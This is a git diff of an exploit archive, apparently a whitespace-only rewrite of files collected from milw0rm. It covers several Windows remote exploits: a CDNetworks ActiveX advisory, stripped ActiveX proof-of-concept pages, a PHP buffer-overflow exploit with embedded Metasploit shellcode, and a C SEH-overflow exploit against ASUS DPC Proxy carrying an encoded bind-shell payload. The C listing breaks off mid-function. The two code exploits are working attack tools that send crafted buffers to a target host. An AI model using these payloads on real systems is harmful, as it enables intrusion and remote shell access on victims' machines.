-Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
-Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
-Severity: High
-Impact: Remote Code Execution
-Vulnerable Systems: MS Windows Systems
-Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
-Solution: Upgrade the vendor's patch
-Vendor's Homepage: http://www.cdnetworks.com
-Reference: How to stop an ActiveX control from running in Internet Explorer
-          http://support.microsoft.com/kb/240797/ko
-          http://support.microsoft.com/kb/240797/en-us
-History:
-  - 02.27.2008: Initiate notify
-  - 03.06.2008: The vendor patched
-  - After: The vendor are applying the patch to their customers.
-
-Description:
-Neffycient Download is a ActiveX control used to download and to upgrade
-such as game install files through HTTP, FTP, etc. It has two
-vulnerabilities.
-1st, a attacker can copy a malicious file to any path such as start program
-folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup).
-2nd, a attacker can issue keycodes which are used to restrict execution on
-other domains.
-
-Object:
-I notify this vulnerability not to promote abnormal uses but to make
-a software more secure. This vulnerability was patched by the vendor's
-positive effort. I hope this information helps many people who try
-to study security and to develop an application.
-
-1. Remote Code Execution
-First of all, we must have write permission on a board in a web site used
-this ActiveX or obtain a valid keycode which is correct to your site.
-An Attacker who has a valid keycode can make a expolit by modifying
-HttpSkin,
-SkinPath's values. Malicious files which is on attacker's site must
-be compressed as ZIP file.
-For instance. The below modification copies abnormal files to Windows's
-root directory.
-
-
-
-In this way an attacker can modify SkinPath's value to All Users's Start
-Program Folder. Then he can execute his malicious program when the user
-restarts his computer.
-
-2. Generating a KeyCode Value
-An attacker can make the keycode generator by debugging this ActiveX
-control. A keycode's value has two meaning. First two digits represent
-the domain's length(hexadecimal).
-Next five(or more) digits are valuable numbers to calculate a domain.
-The keycode check the procedure of this ActiveX control likes below.
-It calculates the keycode's value and returns four bytes as a result.
-Next it starts the domain's calculation and returns four bytes.
-Finally, it compares with these four bytes to check whether the site is
-valid.
-I made a PoC using inline assembly and C. But it doesn't open to the public
-because of the vendor's request. (Just refer above descriptions.)
-
-# milw0rm.com [2008-04-07]
+Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
+Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
+Severity: High
+Impact: Remote Code Execution
+Vulnerable Systems: MS Windows Systems
+Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
+Solution: Upgrade the vendor's patch
+Vendor's Homepage: http://www.cdnetworks.com
+Reference: How to stop an ActiveX control from running in Internet Explorer
+          http://support.microsoft.com/kb/240797/ko
+          http://support.microsoft.com/kb/240797/en-us
+History:
+  - 02.27.2008: Initiate notify
+  - 03.06.2008: The vendor patched
+  - After: The vendor are applying the patch to their customers.
+
+Description:
+Neffycient Download is a ActiveX control used to download and to upgrade
+such as game install files through HTTP, FTP, etc. It has two
+vulnerabilities.
+1st, a attacker can copy a malicious file to any path such as start program
+folder(C:\Documents and Settings\All Users\Start Menu\Programs\Startup).
+2nd, a attacker can issue keycodes which are used to restrict execution on
+other domains.
+
+Object:
+I notify this vulnerability not to promote abnormal uses but to make
+a software more secure. This vulnerability was patched by the vendor's
+positive effort. I hope this information helps many people who try
+to study security and to develop an application.
+
+1. Remote Code Execution
+First of all, we must have write permission on a board in a web site used
+this ActiveX or obtain a valid keycode which is correct to your site.
+An Attacker who has a valid keycode can make a expolit by modifying
+HttpSkin,
+SkinPath's values. Malicious files which is on attacker's site must
+be compressed as ZIP file.
+For instance. The below modification copies abnormal files to Windows's
+root directory.
+
+
+
+In this way an attacker can modify SkinPath's value to All Users's Start
+Program Folder. Then he can execute his malicious program when the user
+restarts his computer.
+
+2. Generating a KeyCode Value
+An attacker can make the keycode generator by debugging this ActiveX
+control. A keycode's value has two meaning. First two digits represent
+the domain's length(hexadecimal).
+Next five(or more) digits are valuable numbers to calculate a domain.
+The keycode check the procedure of this ActiveX control likes below.
+It calculates the keycode's value and returns four bytes as a result.
+Next it starts the domain's calculation and returns four bytes.
+Finally, it compares with these four bytes to check whether the site is
+valid.
+I made a PoC using inline assembly and C. But it doesn't open to the public
+because of the vendor's request. (Just refer above descriptions.)
+
+# milw0rm.com [2008-04-07]
diff --git a/platforms/windows/remote/5398.html b/platforms/windows/remote/5398.html
index 064b365a7..ae736d83c 100755
--- a/platforms/windows/remote/5398.html
+++ b/platforms/windows/remote/5398.html
@@ -1,131 +1,131 @@
-
-
- 
- 
- 
- 
-
-
-
-# milw0rm.com [2008-04-07]
+
+
+ 
+ 
+ 
+ 
+
+
+
+# milw0rm.com [2008-04-07]
diff --git a/platforms/windows/remote/5489.html b/platforms/windows/remote/5489.html
index 83c2b9c64..5eb77fe62 100755
--- a/platforms/windows/remote/5489.html
+++ b/platforms/windows/remote/5489.html
@@ -1,26 +1,26 @@
-Vulnerability class : Arbitrary file overwrite
-Discovery date : 21 April 2008
-Remote : Yes
-Credits : J. Bachmann & B. Mariani from ilion Research Labs
-Vulnerable : Zune software: EncProfile2 Class
-
-An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package.
-If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.
-
-POC:
-
-
- 
-
-
-
-
-
-# milw0rm.com [2008-04-23]
+Vulnerability class : Arbitrary file overwrite
+Discovery date : 21 April 2008
+Remote : Yes
+Credits : J. Bachmann & B. Mariani from ilion Research Labs
+Vulnerable : Zune software: EncProfile2 Class
+
+An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package.
+If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.
+
+POC:
+
+
+ 
+
+
+
+
+
+# milw0rm.com [2008-04-23]
diff --git a/platforms/windows/remote/5496.html b/platforms/windows/remote/5496.html
index 0d7ba6e1d..ab8e45a04 100755
--- a/platforms/windows/remote/5496.html
+++ b/platforms/windows/remote/5496.html
@@ -1,54 +1,54 @@
-****************************************************************************************************************
-Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0
-Remote: Yes
-An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0.
-by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
-****************************************************************************************************************
- 
-
-
- 
-
-
-
-
- 
-
-
- 
-
-
-
-
- 
-
-
-
- 
-
-
-
-
-
-# milw0rm.com [2008-04-25]
+****************************************************************************************************************
+Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0
+Remote: Yes
+An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0.
+by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
+****************************************************************************************************************
+ 
+
+
+ 
+
+
+
+
+ 
+
+
+ 
+
+
+
+
+ 
+
+
+
+ 
+
+
+
+
+
+# milw0rm.com [2008-04-25]
diff --git a/platforms/windows/remote/5511.html b/platforms/windows/remote/5511.html
index 0f0cc556a..7deef0f18 100755
--- a/platforms/windows/remote/5511.html
+++ b/platforms/windows/remote/5511.html
@@ -1,35 +1,35 @@
-&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
-Insecure Methods in HP Update Software.
-Remote: Yes
-Execute code remotely is possible using methods ExecuteAsync and Execute  :-) 
-If a user visits the malicious page the attacker can execute code.
-Coded by callAX
-&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
-
-Proof of Concept
-----------------
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2008-04-27]
+&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+Insecure Methods in HP Update Software.
+Remote: Yes
+Execute code remotely is possible using methods ExecuteAsync and Execute  :-) 
+If a user visits the malicious page the attacker can execute code.
+Coded by callAX
+&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+
+Proof of Concept
+----------------
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2008-04-27]
diff --git a/platforms/windows/remote/5530.html b/platforms/windows/remote/5530.html
index 8cfc838a0..d84cebf2f 100755
--- a/platforms/windows/remote/5530.html
+++ b/platforms/windows/remote/5530.html
@@ -1,122 +1,122 @@
-
-
-
-
-Microsoft Works 7 WkImgSrv.dll Exploit
-
-Coded by lhoang8500
-lhoang8500[at]gmail[dot]com
- BKIS Center - Vietnam
-
-
-  
-
- 
-
-
- 
-
-
-# milw0rm.com [2008-05-02]
+
+
+
+
+Microsoft Works 7 WkImgSrv.dll Exploit
+
+Coded by lhoang8500
+lhoang8500[at]gmail[dot]com
+ BKIS Center - Vietnam
+
+
+  
+
+ 
+
+
+ 
+
+
+# milw0rm.com [2008-05-02]
diff --git a/platforms/windows/remote/5536.php b/platforms/windows/remote/5536.php
index 9c5ac408a..0e4890478 100755
--- a/platforms/windows/remote/5536.php
+++ b/platforms/windows/remote/5536.php
@@ -1,99 +1,99 @@
- JMP EAX*/
-
-# win32_bind - Calc executer. Metasploit.com
-$shellcode =
-"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4".
-"\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1".
-"\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed".
-"\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9".
-"\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2".
-"\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80".
-"\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f".
-"\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc".
-"\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0".
-"\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";
-
-$evilcode = str_repeat("\x90", 100);
-$evilcode.= $shellcode;
-$evilcode.= str_repeat("\x90", 16156-(strlen($shellcode)));
-
-$evilcode.= "\xFD\xAF\x6A\x07"; #076AAFFD   FFE4 => JMP ESP (cstrike\dlls\mp.dll)
-
-
-$evilcode.= str_repeat("\x90", 60-(strlen($scode)));
-$evilcode.= $scode;
-$evilcode.= str_repeat("\x90", 8);
-$evilcode.= str_repeat("0", 72);
-$evilcode.= str_repeat("%00", 4);
-$evilcode.= str_repeat("0", 4);
-$evilcode.= "\x20\xF0\xFD\x7F"; #Windows PEB Lock Pointer
-$evilcode.= str_repeat("%00", 8);
-
-$post = "rconpass=" . $evilcode . "&setcookiesNULL=rconpass";
-
-$pack = "POST /auth.w?redir= HTTP/1.1\r\n";
-$pack.= "Host: {$host}:{$port}\r\n";
-$pack.= "User-Agent: Mozilla/5.0\r\n";
-$pack.= "Accept: */*\r\n";
-$pack.= "Accept-Language: en-us,en;q=0.5\r\n";
-$pack.= "Accept-Encoding: gzip,deflate\r\n";
-$pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
-$pack.= "Keep-Alive: 300\r\n";
-$pack.= "Connection: keep-alive\r\n";
-$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
-$pack.= "Content-Length: ". strlen($post) ."\r\n\r\n" . $post;
-
-echo "[~] Sending...\r\n";
-
-$sock = @fsockopen($host, $port, $errno, $errstr, 10);
-	if ($errstr)
-		echo("[-] Can't connect {$host}:{$port}\r\n");
-	else {
-			fputs($sock, $pack);
-			$tmp = fgets($sock,1024);
-				if(strstr($tmp, '<'))
-					echo "[-] Failed, you better try again.\r\n";
-				else
-					echo "[+] Shellcode should be executed.\r\n";
-			fclose($sock);
-		}
-?> 
-
-# milw0rm.com [2008-05-03]
+ JMP EAX*/
+
+# win32_bind - Calc executer. Metasploit.com
+$shellcode =
+"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4".
+"\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1".
+"\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed".
+"\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9".
+"\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2".
+"\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80".
+"\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f".
+"\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc".
+"\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0".
+"\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";
+
+$evilcode = str_repeat("\x90", 100);
+$evilcode.= $shellcode;
+$evilcode.= str_repeat("\x90", 16156-(strlen($shellcode)));
+
+$evilcode.= "\xFD\xAF\x6A\x07"; #076AAFFD   FFE4 => JMP ESP (cstrike\dlls\mp.dll)
+
+
+$evilcode.= str_repeat("\x90", 60-(strlen($scode)));
+$evilcode.= $scode;
+$evilcode.= str_repeat("\x90", 8);
+$evilcode.= str_repeat("0", 72);
+$evilcode.= str_repeat("%00", 4);
+$evilcode.= str_repeat("0", 4);
+$evilcode.= "\x20\xF0\xFD\x7F"; #Windows PEB Lock Pointer
+$evilcode.= str_repeat("%00", 8);
+
+$post = "rconpass=" . $evilcode . "&setcookiesNULL=rconpass";
+
+$pack = "POST /auth.w?redir= HTTP/1.1\r\n";
+$pack.= "Host: {$host}:{$port}\r\n";
+$pack.= "User-Agent: Mozilla/5.0\r\n";
+$pack.= "Accept: */*\r\n";
+$pack.= "Accept-Language: en-us,en;q=0.5\r\n";
+$pack.= "Accept-Encoding: gzip,deflate\r\n";
+$pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
+$pack.= "Keep-Alive: 300\r\n";
+$pack.= "Connection: keep-alive\r\n";
+$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
+$pack.= "Content-Length: ". strlen($post) ."\r\n\r\n" . $post;
+
+echo "[~] Sending...\r\n";
+
+$sock = @fsockopen($host, $port, $errno, $errstr, 10);
+	if ($errstr)
+		echo("[-] Can't connect {$host}:{$port}\r\n");
+	else {
+			fputs($sock, $pack);
+			$tmp = fgets($sock,1024);
+				if(strstr($tmp, '<'))
+					echo "[-] Failed, you better try again.\r\n";
+				else
+					echo "[+] Shellcode should be executed.\r\n";
+			fclose($sock);
+		}
+?> 
+
+# milw0rm.com [2008-05-03]
diff --git a/platforms/windows/remote/556.c b/platforms/windows/remote/556.c
index e884df2df..63ed8acc5 100755
--- a/platforms/windows/remote/556.c
+++ b/platforms/windows/remote/556.c
@@ -576,6 +576,6 @@ WSACleanup();
 printf("  Exploit JPEG file %s has been generated!\n", jpeg_filename);
 
 return(EXIT_SUCCESS);
-}
-
-// milw0rm.com [2004-09-27]
+}
+
+// milw0rm.com [2004-09-27]
diff --git a/platforms/windows/remote/56.c b/platforms/windows/remote/56.c
index 089c97d76..ae0d507ad 100755
--- a/platforms/windows/remote/56.c
+++ b/platforms/windows/remote/56.c
@@ -111,6 +111,6 @@ void main (int argc, char **argv)
     closesocket (s);
     WSACleanup();
     return;
-}
-
-// milw0rm.com [2003-07-14]
+}
+
+// milw0rm.com [2003-07-14]
diff --git a/platforms/windows/remote/5619.html b/platforms/windows/remote/5619.html
index eac1d901c..ce45379b5 100755
--- a/platforms/windows/remote/5619.html
+++ b/platforms/windows/remote/5619.html
@@ -1,58 +1,58 @@
-
-
-
-
-Print me with table of links to execute calc.exe
-
-
-
-
-
-# milw0rm.com [2008-05-14]
+
+
+
+
+Print me with table of links to execute calc.exe
+
+
+
+
+
+# milw0rm.com [2008-05-14]
diff --git a/platforms/windows/remote/566.pl b/platforms/windows/remote/566.pl
index 62ef351bf..fe3ef86e8 100755
--- a/platforms/windows/remote/566.pl
+++ b/platforms/windows/remote/566.pl
@@ -114,6 +114,6 @@ print "\n Shell on tcp port 28876.\n\n";
 print "ET LoWNOISE 2004\n";
 exit(1); 
 }
-
-
-# milw0rm.com [2004-10-04]
+
+
+# milw0rm.com [2004-10-04]
diff --git a/platforms/windows/remote/5681.html b/platforms/windows/remote/5681.html
index 7f729d4c8..0d7f5aad8 100755
--- a/platforms/windows/remote/5681.html
+++ b/platforms/windows/remote/5681.html
@@ -1,176 +1,176 @@
-
-
-
-
-
-
-
-# milw0rm.com [2008-05-27]
+
+
+
+
+
+
+
+# milw0rm.com [2008-05-27]
diff --git a/platforms/windows/remote/5694.cpp b/platforms/windows/remote/5694.cpp
index 311bed1bc..901e8ca75 100755
--- a/platforms/windows/remote/5694.cpp
+++ b/platforms/windows/remote/5694.cpp
@@ -1,584 +1,584 @@
-/* Dreatica-FXP crew
-* 
-* ----------------------------------------
-* Target         : ASUS DPC Proxy 2.0.0.16/2.0.0.24
-* ----------------------------------------
-* Exploit        : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit
-* Exploit date   : 02.04.2008
-* Exploit writer : Heretic2 (heretic2x@gmail.com)
-* OS             : Windows ALL 
-* Crew           : Dreatica-FXP
-* Location       : http://www.milw0rm.com/
-* ----------------------------------------
-* Info           : Sending long buufer(however the buffer should be send by chunks)
-*                  we obtain a SEH exploitation, due to server bytes stricts i decided
-*                  to use here a alphanumeric shellcodes and jumps.
-* ----------------------------------------
-* Thanks to:
-*		1. Luigi Auriemma          ( http://aluigi.org    )
-*		2. The Metasploit project  ( http://metasploit.com                           ) 
-*       3. ALPHA 2: Zero-tolerance (                  ) 
-*		4. Dreatica-FXP crew       (                                                 )
-************************************************************************************
-* This was written for educational purpose only. Use it at your own risk. Author will be not be 
-* responsible for any damage, caused by that code.
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#pragma comment(lib,"ws2_32")
-
-
-void usage(char * s);
-void logo();
-void end_logo();
-void print_info_banner_line(const char * key, const char * val);
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str);
-int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
-
-int hr2_connect(char * remotehost, int port, int timeout);
-int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
-int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
-int execute(struct _buf * abuf, char * remotehost, int port);
-
-struct _buf 
-{
-	unsigned char * ptr;
-	unsigned int size;
-};
-int construct_shellcode(int sh, struct _buf * shf, int target);
-int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
-
-
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring);
-char	*optarg;		// global argument pointer
-int		optind = 0, opterr; 	// global argv index
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-struct {
-	const char * name;
-	int length;
-	char *shellcode;	
-}shellcodes[]={ 	
-	{  "BindShell on 4444", 
-		/*
-		* windows/shell_bind_tcp - 696 bytes
-		* http://www.metasploit.com
-		* Encoder: x86/alpha_mixed
-		* EXITFUNC=seh, LPORT=4444
-		*/
-		696,
-		"\x89\xe6\xdb\xdd\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
-		"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-		"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-		"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-		"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4a\x59\x4b\x4f\x4b"
-		"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b"
-		"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x45\x51\x4a"
-		"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
-		"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
-		"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x43\x44\x43\x37"
-		"\x49\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47"
-		"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
-		"\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
-		"\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
-		"\x4c\x49\x42\x4c\x46\x44\x45\x4c\x43\x51\x48\x43\x46\x51\x49"
-		"\x4b\x42\x44\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x51\x50\x44\x4c"
-		"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51"
-		"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
-		"\x4e\x36\x42\x46\x51\x43\x45\x36\x42\x48\x50\x33\x47\x42\x45"
-		"\x38\x44\x37\x44\x33\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50"
-		"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49"
-		"\x46\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58"
-		"\x45\x52\x46\x35\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x4e"
-		"\x39\x44\x49\x4b\x45\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x46\x33"
-		"\x46\x33\x51\x43\x51\x43\x50\x53\x47\x33\x46\x33\x47\x33\x46"
-		"\x33\x4b\x4f\x48\x50\x43\x56\x42\x48\x42\x31\x51\x4c\x45\x36"
-		"\x51\x43\x4b\x39\x4d\x31\x4a\x35\x43\x58\x4e\x44\x44\x5a\x42"
-		"\x50\x48\x47\x46\x37\x4b\x4f\x48\x56\x42\x4a\x42\x30\x50\x51"
-		"\x50\x55\x4b\x4f\x4e\x30\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
-		"\x49\x51\x47\x4b\x4f\x4e\x36\x51\x43\x50\x55\x4b\x4f\x4e\x30"
-		"\x42\x48\x4a\x45\x51\x59\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
-		"\x36\x50\x50\x46\x34\x50\x54\x46\x35\x4b\x4f\x48\x50\x4c\x53"
-		"\x43\x58\x4b\x57\x42\x59\x49\x56\x42\x59\x50\x57\x4b\x4f\x48"
-		"\x56\x51\x45\x4b\x4f\x4e\x30\x43\x56\x43\x5a\x43\x54\x42\x46"
-		"\x43\x58\x45\x33\x42\x4d\x4b\x39\x4d\x35\x42\x4a\x46\x30\x51"
-		"\x49\x51\x39\x48\x4c\x4c\x49\x4d\x37\x43\x5a\x50\x44\x4c\x49"
-		"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x50\x42\x46"
-		"\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38"
-		"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e\x48\x33\x42"
-		"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x48\x56\x51\x4b\x46\x37"
-		"\x51\x42\x50\x51\x50\x51\x50\x51\x42\x4a\x45\x51\x46\x31\x50"
-		"\x51\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x4e\x39"
-		"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
-		"\x4f\x47\x47\x4b\x4f\x48\x50\x4c\x4b\x51\x47\x4b\x4c\x4c\x43"
-		"\x49\x54\x42\x44\x4b\x4f\x48\x56\x51\x42\x4b\x4f\x4e\x30\x42"
-		"\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x48\x56"
-		"\x4b\x4f\x48\x50\x41\x41"
-
-	},
-	{NULL, 0, NULL}
-};
- 
-struct _target{
-	const char *t ;
-	unsigned long ret ;
-} targets[]=
-{	
-	{"ASUS DpcProxy 2.0.0.16/2.0.0.19",      0x0040273b },
-	{"DOS/Crash/Debug/Test/Fun",             0x00400101 },
-	{NULL,                                   0x00000000 }
-};
-
-// memory for buffers
-unsigned char payloadbuffer[10000], a_buffer[10000];
-long dwTimeout=5000;
-int timeout=5000;
-
-int main(int argc, char **argv)
-{
-	char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
-	int sh,port=623,itarget=0;
-	struct _buf  fshellcode, sbuffer;
-
-	logo();
-	if(argc<2)
-	{
-		usage(argv[0]);		
-		return -1;
-	}
-
-	WSADATA wsa;
-	WSAStartup(MAKEWORD(2,0), &wsa);
-	// set defaults
-	sh=0;	
-	// ------------	
-	
-	while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
-	{
-		switch (c)
-		{
-			case 'h':
-				if (strchr(optarg,':')==NULL)
-				{
-					remotehost=optarg;
-				}else 
-				{
-					sscanf(strchr(optarg,':')+1, "%d", &port);
-					remotehost=optarg;
-					*(strchr(remotehost,':'))='\0';
-				}
-				break; 				
-			case 't':
-				sscanf(optarg, "%d", &itarget);
-				itarget--;
-				break;					
-			case 'T':				
-				sscanf(optarg, "%ld", &dwTimeout);
-				break; 			
-			default:
-	            usage(argv[0]);
-				WSACleanup();
-			return -1;
-		}		
-	}	
-	if(remotehost == NULL)
-	{
-		printf("   [-] Please enter remotehost\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	print_info_banner_line("Host", remotehost);
-	sprintf(temp1, "%d", port);
-	print_info_banner_line("Port", temp1);
-	print_info_banner_line("Payload", shellcodes[sh].name);
-
-	if(sh==0)
-	{		
-		sprintf(temp1, "%d", 4444);
-		print_info_banner_line("BINDPort", temp1);
-	}
-
-	printf(" # ------------------------------------------------------------------- # \n");
-	fflush(stdout);
-
-
-	memset(payloadbuffer, 0, sizeof(payloadbuffer));
-	fshellcode.ptr=payloadbuffer;
-	fshellcode.size=0;	
-
-	memset(a_buffer, 0, sizeof(a_buffer));
-	sbuffer.ptr=a_buffer;
-	sbuffer.size=0;
-
-	if(!construct_shellcode(sh, &fshellcode, itarget))
-	{
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-
-	printf("   [+] Payload constructed\n");
-	
-	if(!construct_buffer(&fshellcode, itarget, &sbuffer))
-	{
-		printf("   [-] Buffer not constructed\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	printf("   [+] Final buffer constructed\n");
-	
-
-	if(!execute(&sbuffer, remotehost, port))
-	{
-		printf("   [-] Buffer not sent\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	printf("   [+] Buffer sent\n");
-	
-	end_logo();
-	WSACleanup();
-	return 0;
-}
-
-int construct_shellcode(int sh, struct _buf * shf, int target)
-{
-	memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
-	shf->size=shellcodes[sh].length;	
-	return 1;
-}
-
-
-char JMPX[] = 
-		// get ecx
-		"\x89\xE6\xDB\xDD\xD9\x76\xF4\x59"
-		// alphanum-decoder
-		"\x49\x49\x49" 
-		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
-		"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
-		"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-		// encoded jump
-		"\x59\x6f\x7a\x47\x41"
-		// back jump
-		"\x89\xE6\xDB\xDD\xD9\x76\xF4\x5f\x81\xef\xf8\x1a\x00\x00\xeb\xb3";
-
-int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
-{
-	unsigned char * cp = sbuf->ptr;
-	memset(cp, 'A', 1000);
-	cp+=20;
-	memcpy(cp, shf->ptr, shf->size);
-	cp+=1000-20;
-	memset(cp, 'B', 1000);
-	cp+=1000;
-	memset(cp, 'C', 1000);
-	cp+=1000;
-	memset(cp, 'D', 1000);
-	cp+=1000;
-	memset(cp, 'E', 1000);
-	cp+=1000;
-	memset(cp, 'F', 1000);
-	cp+=1000;
